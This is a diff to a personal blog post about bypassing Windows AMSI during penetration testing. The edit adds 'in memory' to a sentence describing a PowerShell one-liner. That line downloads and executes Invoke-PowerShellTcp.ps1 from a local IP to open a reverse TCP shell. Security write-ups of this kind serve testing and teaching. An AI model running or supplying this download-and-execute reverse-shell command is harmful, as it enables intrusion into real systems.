Kwangyun/Kwangyun.github.io/_posts/2023-05-10-Bypassing-AMSI-2023.md

 ![](/assets/AV/Final.gif)

-To verify that AMSI is correctly functioning, the tester first tried to initiate a reverse TCP connection through powershell using the below command.
+To verify that AMSI is correctly functioning, the tester first tried to initiate a reverse TCP connection through powershell using the below command in memory.
 ```bash
 IEX (New-Object Net.WebClient).DownloadString('http://192.168.20.128:8443/Invoke-PowerShellTcp.ps1')
 ```